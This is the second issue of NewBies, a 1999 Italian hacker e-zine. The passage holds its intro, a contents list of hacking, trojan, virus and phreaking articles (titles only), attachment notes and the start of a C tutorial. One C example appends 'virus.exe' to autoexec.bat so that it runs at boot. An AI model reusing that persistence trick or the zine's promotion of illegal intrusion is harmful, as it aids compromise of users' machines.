Copy Link
Add to Bookmark
Report

NewBies 2

eZine's profile picture
Published in 
NewBies
 · 21 Aug 2019

  


@-,”ì'ì”,.,”ì'ì”,.,”ì'ì”,.,”ì'ì”,.,”ì'ì”,-@
| _ _ ____ _ |
| | \ | | _____ _| __ )(_) ___ ___ |
-+- | \| |/ _ \ \ /\ / / _ \| |/ _ Y __|-+-
: | |\ | __/\ V V /| |_) | | __|__ \ :
| |_| \_|\___| \_/\_/ |____/|_|\___|___/ |
@-,”ì'ì”,.,”ì'ì”,.,”ì'ì”,.,”ì'ì”,.,”ì'ì”,-@

NEW BIES (num 2) (data 07/03/99)

[ powered By ZeroCool and N0bodY88 ]

DISCLAIMER LEGALE
------------------------------------------------------------------------------
IL NEWBIES STAFF NON SI ASSUME NESSUNA RESPONSABILITA' X L'UTILIZZO DELLE
TECNICHE SOTTO RIPORTATE, LE QUALI SONO STATE DISTRIBUITE UNICAMENTE X
CONDIVIDERE LE CONOSCENZE DA NOI "ACUISITE" (mitico edu...) E PER CERCARE
QUALCUNO CON CUI CONFONTARE LE NS ESPERIENZE E LE CONOSCENZE X MIGLIORARE
VICENDEVOLMENTE.....DIVERTENDOSI! N0bodY88 of NewBies Staff
------------------------------------------------------------------------------

PREMESSA
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
Questa e-zine e' nata in una giornata qualsiasi di gennaio, mentre 2 newbies
stavano parlando tra loro in IRC di non mi ricordo cosa. Da quel fatidico
giorno la e-zine e' cresciuta, le persone che ho contattato x scrivere un
articolo mi hanno dato la loro disponibilita' e entro alcuni giorni mi hanno
fatto avere il loro operato. Alcune persone hanno fatto tardi x notti intere
(fra cui il sottoscritto) ed hanno sacrificato il loro tempo x creare qualcosa
che fosse nuovo, divertente, che ci facesse diventare + bravi, + amici, + uniti
e forse...beh...forse anche + famosi...hihihi! Questo e' quello che abbiamo
realizzato insieme, collaborando e scambiandoci opinioni. Se questa e-zine
non vi piace, e' troppo semplice o e' stupida non scriveteci (oppure scriveteci
x migliorare un art. della e-zine sfruttando le vostre conoscenze) ma se solo
sara' piaciuta ad una persona, se solo un ragazzo dopo aver letto questa avra'
deciso di passare a linux, di programmare in visual basic, di farsi una propria
backdoor o di mettersi a studiare come si usa telnet (troppo poco attrezzato di
voci nei menu x essere quello tanto decantato dovunque, ma anche troppo simpatico
con il suo prompt a mo di Commodore 64) allora questa e-zine sara' servita a
qualcosa. E ricordate...newbies si nasce, hacker si diventa.
Buona lettura ^__^ N0bodY88
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

INTRODUZIONE:

Hey ciao benvenuti a NewBies n.2 la nostra strafigha e-zine , bhe stavolta
abbiamo apportato dei cambiamenti ad esempio abbiamo letto meglio gli articoli
confrontandoli con quelli gia' esistenti di altre e-zines per evitare che
qualcuno faccio copiature e rippamenti vari e qui ringrazio Lord Guf x averci
aiutato a trovare articoli poco edificanti contenuti nel numero 1.
Cavolo io N0bodY88 siamo felicissimi di continuare quest' azzentura [sei mitico
N0bodY88] e speriamo di poter dare con questo numero un taglio + tecnico alla e-zines.
Grazie a tutti quelli che hanno letto il n.1 e spero che sto numero piaccia molto di + .
Ringrazio RigoR MorteM , ChRoMe , Brigante, Master di SPP per averci sostenuto e
aver parlato di noi nella loro e-zines ; Ringrazio Blum e quelli di Spaghetti
Phreackers per il link e i consigli al nostro sito. Ringrazio gli stramitici
BFI e in particolare Spirito per la sua cordialita' e disponibilita' , siete
veramente mitici spero un giorno di diventare come voi . Continuate cosi'
SiEtE I MiGliOrI .... Un grazie a tutti quelli che conosco , a DarkSchanider e
a tutti quelli che in mirc ci hanno dato un poco disupporto morale...GRAZIEEEE.
Voglio anche mettere un particolare ''saluto'' a Luce e a Mofoz che anche se
la sorte avversa li ha toccati rimarrano nel cuore di tutti noi , questo e'da
parte di ZeroCool x Voi e vi dedico questa frase :
Non cercare di capire ,
Non cercare di pensare ,
Non cercare di credere in qualcosa in cui tu non riesci a credere stupido essere ,
Noi siamo cio' che tu non sei ,
Noi siamo la Luce [e/o la cerchiamo] e tu il buio , puoi fermare uno di noi ma non tutti .
UN FUCK A TUTTI GLI ENTI e a TELECOM in particolare noi non abbiamo paura di
voi ma voi si per questo volete fermarci ma mai e poi mai ci riuscirete noi siamo
troppi e molti si aggiungono. Un mio saluto a tutto quelli che ci lavorano e mi
danno una mano a fotterla.

Ciaoz da ZeroCool
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º ARTICOLO ÌÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎ͹ AUTORE º
ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
³NOVITA' DAL MONDO NewBies Staff ³
³ CONOSCETE NETRUNNERS? NO??? E COME FATE A VIVERE?????? N0bodY88 ³
³ DIAMO AD AVATAR CIO' CHE E' DI AVATAR N0bodY88 ³
³INFO SUGLI ALLEGATI NewBies Staff ³
³ 2 PAROLE SUGLI ALLEGATI N0bodY88 ³
³PROGRAMMAZIONE NewBies Staff ³
³ C TUTORIAL [ SECONDA PARTE ] ElectroRipper ³
³ VB TUTORIAL [ SECONDA PARTE ] R0n|n ³
³ PASCAL TUTORIAL [ PRIMA PARTE ] T0rment0 ³
³ JAVA TUTORIAL [ PRIMA PARTE ] SkHammer ³
³ VB AVANZATO Master ³
³ JAVASCRIPT Master ³
³ COME ELIMINARE I BANNER DALLE HP Master ³
³ANARCHIA, BANCHE, BOMBE ET SIMILI NewBies Staff ³
³ STINKY BOMB Avatar666 ³
³ DIVERTIRSI A SCUOLA ElectroRipper ³
³ COME FOTTERE I SOLDI AL VS VICINO IN MODO DEL TUTTO LEGALE N0bodY88 ³
³ SCHERZI TELEFONICI ElectroRipper ³
³CRITTOGRAFIA E STEGANOGRAFIA NewBies Staff ³
³ CRITTOGRAFIA E SEMPLICI IDEE X FARSI QUALKE PROGRAMMINO N0bodY88 ³
³ STEGANOGRAFIA FOR DUMMIES Nietzsche ³
³ STEGANOGRAFIA CON IL PROGRAMMA IME Nietzsche ³
³ CRITTOGRAFIA FOR DUMMIES Nietzsche ³
³CRACKING NewBies Staff ³
³ CRACK FOR BEGINNERS ZioFill ³
³ CRACKING QUESTO SCONOSCIUTO SpYmAsTeR ³
³ MASTERIZZARE CHE PASSIONE KaOsS ³
³TEORIA NewBies Staff ³
³ FIREWALL E PROTOCOLLI INTERNET The Duke ³
³ SSL Brigante ³
³ INTRODUZIONE AL RARP Darkman ³
³ BOOTP Darkman ³
³ IP SPOOFING & IP MASQUERADE Ramesse ³
³ SMTP N0bodY88 ³
³TRADUZIONI NewBies Staff ³
³ TROJAN HORSES, VIRUSES AND WORMS Wurz ³
³ A HACKER by VAN HAUSER Wurz ³
³INTERVISTE NewBies Staff ³
³ INTERVISTA A UN HACKER/PHREAKER N0bodY88 ³
³ INTERVISTA A UN EX CRACKER ORA HACKER N0bodY88 ³
³PHREAKING NewBies Staff ³
³ TELEFONARE GRATIS Fusyllo ³
³ FORSE NON SAPEVATE CHE... ]Akuma[ ³
³ COSA C'E' DIETRO AD UN GREEN ZeroCool ³
³HACKING DI TUTTO DI PIU' E DIVERSI ART. MOLTO INTERESSANTI NewBies Staff ³
³ HOTLINES QUESTO SCONOSCIUTO Nemesis ³
³ FTP BOUNCE Ghimlet ³
³ VIRUS X DOS 6.1 SorrowThePrince³
³ QUALCHE INFO SU ANGELFIRE SkHammer ³
³ COME MANTENERE LA VOSTRA PAGINA "ILLEGALE" Biavo ³
³ COME CAMBIARE ICONE CON REGEDIT RigoR MorteM ³
³ USARE ZAP2 X RENDERSI INVISIBILE RaG3 ³
³ FINGER Fritz ³
³ COME MODIFICARE SPEAKEASY X NON ESSERE BECCATI Meew ³
³ COS'E'E COME SI USA UNA SHELL Fritz ³
³ PROGETTO FUCKTEL - TELECOZZ E VARIE COSETTE UTILI ZeroCool ³
³ DIRECTORY DI SISTEMA CON DESCRIZIONE Zinco ³
³ INSTALLAZIONE LINUX Dante Alighieri³
³ LOGHI OEM RigoR MorteM ³
³ COME REGISTRARE UN CANALE CON IL CHANSERV Newbie 1.1 ³
³ OVERCLOCKING ULNTWH99 ³
³ IP ROUTING ZeroCool ³
³ TROJAN FOR DUMMIES Nietzsche ³
³ PRIVACY QUESTA SCONOSCIUTA Alby ³
³ GUIDA DI BASE AL SOCIAL ENGEENERING ElectroRipper ³
³ DOVE E COME METTERE BACKDOOR LordDestruction³
³ QUALCHE MUST HAVE (URL INTERESSANTI) Fritz ³
³ LINUX: COME METTERE UN FTP ANONIMO T0rment0 ³
³ LISTA PROXY Sciaman ³
³ HACKING DI WINDOZZO NT Game ³
³ CARATTERISTICHE DISTRIBUZIONI LINUX T0rment0 ³
³ METTERE L'APPROVED CON AGENT Fritz ³
³ COME TOGLIERE I TROJAN Lopks ³
³ L'MP3: QUESTO SCONOSCIUTO Sciaman ³
³ OVERCLOCK Dante alighieri³
³ PICCOLI TRUCCHI PER NEWBIES T0rment0 ³
³ COME DIVENTARE OP CON UNA BOTTA DI...CULO P0nic0 ³
³SALUTI ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
²°°°°°°°°°°°ÛÛÛ°°°ÛÛ°°ÛÛÛÛÛÛ°°ÛÛ°°°°°°°ÛÛ°°ÛÛ°°ÛÛÛÛÛÛÛÛÛÛ°°°°°°°°°°°ÛÛ°°°°°°°²
²°°°°°°°°°°°ÛÛÛÛ°°ÛÛ°°ÛÛ²²ÛÛ°°°ÛÛ°°°°°ÛÛ°°°°°°°Û°°°ÛÛ°°°Û°°°°°°ÛÛÛ°°ÛÛ°°°°°°°²
²°°°°°°°°°°°ÛÛ°ÛÛ°ÛÛ°°ÛÛ²²ÛÛ°°°°ÛÛ°°°ÛÛ°°°°ÛÛ°°ÛÛÛ°ÛÛ°ÛÛÛ°°°°°ÛÛ²ÛÛ°°°°°°°°°°²
²°°°°°°°°°°°ÛÛ°°ÛÛÛÛ°°ÛÛ²²ÛÛ°°°°°ÛÛ°ÛÛ°°°°°ÛÛ°°°°°°ÛÛ°°°°°°°°ÛÛÛÛÛÛÛ°°°°°°°°°²
²°°°°°°°°°°°ÛÛ°°°ÛÛÛ°°ÛÛÛÛÛÛ°°°°°°ÛÛÛ°°°°°°ÛÛ°°°°°°ÛÛ°°°°°°°ÛÛ°°°°°ÛÛ°°°°°°°°²
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ CONOSCETE NETRUNNERS? NO??? E COME FATE A VIVERE?????? ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

NetRunners per i poki newbies e hackers che non la conoscono e' un mitica e-zine
frutto del lavoro di un gruppo hacker italiano che se non raggruppa i migliori
elementi italiani... be ci va vicino! Il gruppo si chiama SPP (SpiPPoLaTorI) e sono
formati da un gruppo di amici con conoscenze diciamo...vicine all'infinito+1...eheheh
Il sito in cui DOVETE andare a scaricare la ezine arrivata al bellissimo numero 3
dedicato a netcat [ se non sapete cos'e'...scaricatela :-) ], si trova all'url:

http://members.tripod.com/~teresacanis/

e non fate i tirchi ma date un okkiata all'ottimo sito realizzato da RigoR MorteM
con l'aiuto di Teresa x la grafica...poi ditemi che non vi passiamo buoni link :P
Colgo l'occasione x salutare ChRoMe e tutti quelli che aiutano il prog. NetRunners
e buona fortuna x il futuro :)

N0bodY88

PS: quasi dimenticavo....un grazie x averci dato una mano a ChRoMe e RigoR sia x
la ricerca di nuovi articoli, che x averci fatto pubblicita' :-)

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ DIAMO AD AVATAR CIO' CHE E' DI AVATAR ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Grazie alla segnalazione di Avatar, il NewBies Staff con me in testa si scusa con
Avatar666, dato che nel primo numero di NewBies i green che sono stati dati erano
stati "copiati e incollati" da una vecchia versione del Cookbook del mitico
Avatar e a lui, quale autore del txt e scopritore degli stessi, non erano stati
dati alcuni meriti, se non quello di aver scoperto il numero di sua eminenza.
Alle foto sulla cabina "aperta con dolcezza" (eheheheh) allegate in un altro zip al
1ø numero non possiamo aggiungere altri articoli o foto degli IHC che cmq ci hanno
promesso che se faranno qualcos'altro ce lo faranno pubblicare su uno dei prossimi
numeri (mitici!!!) quindi pregate a mani congiunte che forse x il 3ø num DrShade e
Cyrus The Virus ci presenteranno un'altro dei loro interessantissimi articoli. :)))
Ci scusiamo quindi con Spaghetti (che porta avanti un progetto importante x la scena
italiana) x le le foto delle cabine prese senza dare meriti al mitico Spaghetti
e ad Avatar (che le ha fatte) a cui va tutta la nostra riconoscenza e la ns gratitudine
per averci fatto notare i mancati riferimenti del 1ø num. Sperando in un 2ø numero
migliore ricordo a tutti gli scrittori e a tutti i newbies che se all'interno dei
propri articoli si citano testi altrui va specificato chi e' l'autore o il traduttore
e se e' possibile bisogna contattarlo x chiedere la pubblicazione (come avevo fatto
io con il mitico X-H4ck3r). Ora vi lascio con una frase di un amico hacker americano:
INFORMATION WANTS TO BE FREE...BUT REMEMBER THE AUTHOR!!!

Allego qua sotto il link al sito Spaghetti Phreakers, dove tra l'altro trovate
anche il mitico Cookbook di Avatar (che x dimostrare che non ci sono problemi ora
che e' tutto risolto ci ha permesso di includere un art. del suo nuovo Cookbook
che deve ancora uscire nella ns e-zine!!! mitico Ava66!!!)

http://come.to/spaghettiphreakers/ <-- CHI NON CI VA, LEGGENDO QUESTA EZINE SI
RITROVERA' 40 TROJAN INSTALLATI SU PC!

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
²°°°°°°°°°°°°°°°°°°ÛÛ°°°°ÛÛ°°°°ÛÛÛÛ°°ÛÛÛÛÛÛÛ°°°°°°°°ÛÛÛÛÛÛÛÛÛÛÛÛÛ°Û°°°°°°°°°°°°²
²°°°°°°°°°°°ÛÛÛ°°°°ÛÛ°°°°ÛÛ°°°°ÛÛ°°°°ÛÛ°°°°°°°°°ÛÛÛ°°°°°°ÛÛÛ°°°°°°°°°°°°°°°°°°°²
²°°°°°°°°°°ÛÛ²ÛÛ°°°ÛÛ°°°°ÛÛ°°°°ÛÛÛÛ°°ÛÛ°ÛÛÛÛ°°°ÛÛ²ÛÛ°°°°°ÛÛÛ°°°°ÛÛÛ°°°°°°°°°°°°²
²°°°°°°°°°ÛÛÛÛÛÛÛ°°ÛÛ°°°°ÛÛ°°°°ÛÛ°°°°ÛÛ°°°ÛÛ°°ÛÛÛÛÛÛÛ°°°°ÛÛÛ°°°°ÛÛÛ°°°°°°°°°°°°²
²°°°°°°°°ÛÛ°°°°°ÛÛ°ÛÛÛÛÛ°ÛÛÛÛÛ°ÛÛÛÛ°°ÛÛÛÛÛÛÛ°ÛÛ°°°°°ÛÛ°°°ÛÛÛ°°°°ÛÛÛ°°°°°°°°°°°°²
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

2 PAROLE SUGLI ALLEGATI:

- regmon = prog. che serve x crackare; il suo utilizzo viene spiegato nel proprio
articolo da ZioFill;
- ime = Image Mesage Encryptor ver 1.0 by Christian; programma che serve x
nascondere i propri messaggi all'interno di immagini con estensione .jpg
inserito xche' Nietzsche ne parla in uno dei suoi articoli sulla Stenografia
(argomento imo molto interessante, i questo momento in cui la privacy sembra
non esistere...);
- s-tools = programma usato x nascondere i propri msg in suoni o immagini; il suo
utilizzo e' spiegato nel proprio articolo da Nietzsche;
- ban = zip contenente un immagine e una pagina .htm grazie al quale si puo' vedere
cio' di cui Master parla in uno dei suoi articoli riguardo alla morte dei
ban che appaiono sulle hp free;

- hackernovello = una guida in .htm che ho pensato di non addare all'interno della
ezine, per mantenerla nel formato originale; questa guida fatta
dal ns mitico T0rment0 (che in questo stesso numero ha anke
iniziato un tutorial di Pascal utile a tutti i programmatori imo)
la trovate anke sul suo sito [ http://come.to/hackernovello ].

- ocx = serve x registrare il famoso winsck.ocx il file che meta' dei programmini
in rete (winnuke, portrscan e altri) richiedono x funzionare; un grazie
particolare a Urkes :)))

- loghioem = mitico esempio concessoci da RigoR MorteM su come cambiare una cosetta
molto simpatica in win, provate e rimarrete stupiti da questo trucco
imo molto bello e da me usato a scuola [dove c'e' scritto "N0bodY88 has
been here"
hack the planet - information wants to be free] e adesso
comnciate a darmi del lamer...hihihi

- anti-s.zip = in euqesto zip sono contenuti 5 documenti di un insieme di 30 doc
sulle reti, e ad ogni numero di newbies aggiungeremo 5 numeri fino a
pubblicarli tutti...ps complimenti Anti-s :)

- zerocool.zip = mitico zip con all'interno dei numeri telefonici e dei dati sicuramente
interessanti per tutti i phreakers li' fuori che avranno cosi' nuove
info da "addare" ai propri archivi :) Sono anke contenute una
worldlist e altre info molto utili ^_^ PS: zero 6 |\/| | ^|^ | [ []

- vecna.zip = un insieme di articoli con l'elenco aggiornato dei bug di sendmail
datoci dal mitico vecna...questo insieme di articoli potrebbe essere
una ezine da solo xche' con tutte le cose che sa lui...ho pensato di
metterlo in uno zip a parte primo perche' sono + art molto interessanti
e poi xche'...Vecna e' Vecna!!! Vecna 61m1t0!!!


Dovrebbero esserci tutti questi prog acclusi, ma magari dividiamo in 2 la ezine...
con tutti gli articoli che abbiamo riusciremmo a fare un numero 2 e un numero 3 :))

N0bodY88
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
²°°ÛÛÛÛÛÛÛÛÛÛÛÛÛ°°°ÛÛ°ÛÛÛÛÛÛÛÛÛÛÛÛÛ°ÛÛÛÛÛÛÛÛ°ÛÛÛÛÛÛ°°ÛÛ°°°°°°°°°°°°°ÛÛ°°°°°°°²
²°°°°°°°ÛÛÛ°°°°°°°°ÛÛ°°°°°°ÛÛÛ°°°°°°ÛÛ²²²²ÛÛ°ÛÛ²²ÛÛ°°°°°°°°°°ÛÛÛ°°°°ÛÛ°°°°°°°²
²°°°°°°°ÛÛÛ°°°ÛÛ°°°ÛÛ°°°°°°ÛÛÛ°°°°°°ÛÛ²²²²ÛÛ°ÛÛÛÛ°°°°ÛÛ°°°°°ÛÛ²ÛÛ°°°ÛÛ°°°°°°°²
²°°°°°°°ÛÛÛ°°°ÛÛ°°°ÛÛ°°°°°°ÛÛÛ°°°°°°ÛÛ²²²²ÛÛ°ÛÛ°ÛÛ°°°ÛÛ°°°°ÛÛÛÛÛÛÛ°°ÛÛ°°°°°°°²
²°°°°°°°ÛÛÛ°°°ÛÛÛÛÛÛÛ°°°°°°ÛÛÛ°°°°°°ÛÛÛÛÛÛÛÛ°ÛÛ°°ÛÛ°°ÛÛ°°°ÛÛ°°°°°ÛÛ°ÛÛÛÛÛÛ°°°²
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸
³ ::::::::::::::::::::::::::: |
ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵
³ Titolo: Corso di C - II Parte ³
ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵
³ di : ElectroRipper ³
ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵
³ Scritto il : xx/2/99 ³
ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͵
³ Pericolo: Û°°°°°°°°° ³
ÔÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ;


ElectroRipper_______CORSO_DI_C________II__PARTE___________________________________


if ((aveteseguitolaprimaparte()) || (necapitegiaqualcosa())) {

continuatealeggere();

}

else {

leggetevilaprimaparte();

} // eheh, mi divertono sempre queste stronzate :)
______________________________________________________________________________


Allora, comincio dicendo che CRUSAD3R, autore della prima parte, nonche'
cugino del sottoscritto, e' morto, e ha espresso nel testamento, come sua
ultima volonta', il desiderio che io continuassi sto benedetto corso di C.

Prima di cominciare a parlare della gestione dei file devo introdurre le
strutture.

Dunque, mettiamo per esempio che vogliate fare un gioco di corsa di
automobili (ehhhhhhhhh! e state leggendo questo tutorial ?)
Per ogni automobile vi serve sapere il nome, la velocita' massima, e i soldi
posseduti dal guidatore.
Sarebbe comodo se ci fosse un tipo di variabile automobile che potesse
contenere tutti questi dati, non trovate ? Una variabile del genere si chiama
struttura....

Es.

struct automobile{
char *nome;
int velmax;
long soldi;
};


Ecco il tipo di variabile che ci serviva !
Adesso pero' dobbiamo definire la variabile vera e' propria...


Es.

struct automobile auto1;
struct automobile auto2;
struct automobile auto3;


In questo modo creiamo 3 variabili di tipo automobile chiamate auto1, auto2
e auto3. Ognuna di queste variabili conterra' al suo interno i membri della
struttura automobile.

Es.

strcpy(auto1.nome,"Fiat 500");
auto1.soldi = 0;
auto1.velmax = 150;


Ovviamente, tornando all'esempio del gioco di corsa, converrebbe creare un
array di automobili...

Es.

struct automobile automobili[10];

-------

Ora vi spieghero' la gestione dei file da un punto di vista logico,
cioe' non dovrete preoccuparvi di come il sistema operativo gestisce
fisicamente i file, anche perche' questo richiederebbe una spiegazione
a parte per ogni OS, mentre una delle caratteristiche piu' lodate del C e' la sua
portabilita' da un sistema a un altro, quindi conviene piu' conoscere
dei metodi generici di I/O, da potere poi usare sulla maggiorparte degli OS.
Possiamo immaginare un file come un archivio contenente un certo numero di
bytes ordinati, messi in fila uno di seguito all'altro.
Ci sono due modi di accedere ad un file : in modo sequenziale (cioe' i
bytes vengono scritti o letti in ordine, partendo dall'inizio del file),
e in modo random, cioe' scrivendo o leggendo direttamente nel punto
desiderato del file.
I File di testo sono file formati da caratteri ascii, che non possono
contenere il carattere 26 (EOF) dato che questo viene usato solo per indicare
la fine del file.
Ora, prima di continuare con la teoria, facciamo qualche esempio....



#include <stdio.h>

main(){
FILE *ilfile;

ilfile = fopen("\\autoexec.bat","a");
fprintf(ilfile,"%s","virus.exe");
fclose(ilfile);

}

Non mi soffermo sulle stronzate che dovreste aver gia' imparato dalla prima
puntata (main e #include), e vado direttamente alla chiamata a fopen.
Questa e' la funzione di stdio che serve ad aprire un file.
Il valore di ritorno lo assegniamo al puntatore al tipo FILE "ilfile".
Il primo argomento di fopen e' il nome del file da aprire, il secondo
serve a specificare in che modo vogliamo aprire il file (in questo caso
a = appending, cioe' quello che scriviamo viene messo alla fine del file,
senza cancellare le righe gia' esistenti. "w" invece corrisponde a write,
cioe' crea un file per scriverci dentro, se il file gia' esiste lo sovrascrive.
"r" indovinate un po' a che serve ? :)

Possiamo anche combinare piu' modi tra di loro per definire l'accesso al file
che ci serve. Ad esempio "rwt" indica che vogliamo creare il file e poi
accedervi in lettura e scrittura, trattandolo come file di testo ("t")

Con fprintf scriviamo qualcosa nel file (alla fine del file in questo caso).
I parametri da passare sono gli stessi di printf, ad eccezione del
primo, che deve essere il puntatore a FILE.
In questo caso la funzione scrive la stringa "virus.exe" alla fine
del file aperto in ilfile, cioe' l'autoexec.bat.

Con fclose chiudiamo il file (operazione necessaria, altrimenti tutte le
modifiche vanno perse).

Quando operiamo su un file aperto come file di testo troviamo alcune limitazioni.
Per prima cosa il carattere 26 viene considerato come fine del file, inoltre
le funzioni seguono alcune convenzioni del sistema operativo. Ad esempio nel
DOS, quando nel file si incontra la combinazione di caratteri CRLF (Return+Linefeed)
viene letto un solo carattere, cioe' \n (se non sapete cos'e' dovreste andare
a rivedervi la prima parte).
Se vogliamo leggere il contenuto del file cosi' com'e', dobbiamo aprirlo in
modo binario, anziche' come file di testo. Al posto di "t" useremo quindi "b".

Es. ilfile = fopen("\\command.com","rb");

In tal modo tutti i caratteri verranno letti esattamente come si trovano
nel file, senza conversioni.

Scrivendo un numero in un file binario questo verra' scritto sotto forma
di caratteri ascii, occupando quindi due soli byte per un int (risparmiando
quindi spazio. Un altro vantaggio dell'uso dei file binari).

Per leggere da un file, invece, possiamo usare la funzione fscanf, simile
alla scanf, tranne che per il primo parametro, che deve essere il puntatore
a FILE.

Es. fscanf(ilfile,"%d",&numero);

------

Il programma apre automaticamente alcuni file...

stdout = La periferica standard di output (video, ma puo' essere ridirezionato)
stdin = " " " " input (tastiera)
stderr = " " " " error (video)
stdprn = Stampante Standard (stampante)

Es. fscanf(stdin,"%d",&ilnumero); // legge un numero dalla tastiera

-----

Ritornando ai file binari, un'importante funzione e' fwrite.

Es.

#include <stdio.h>

main(){
FILE *ilfile;
int ilnumero;

ilfile = fopen("prova.prv","wb");
fwrite(&ilnumero,sizeof(ilnumero),1,ilfile);
fclose(ilfile);

}

Il primo argomento e' l'indirizzo della variabile, il secondo la dimensione
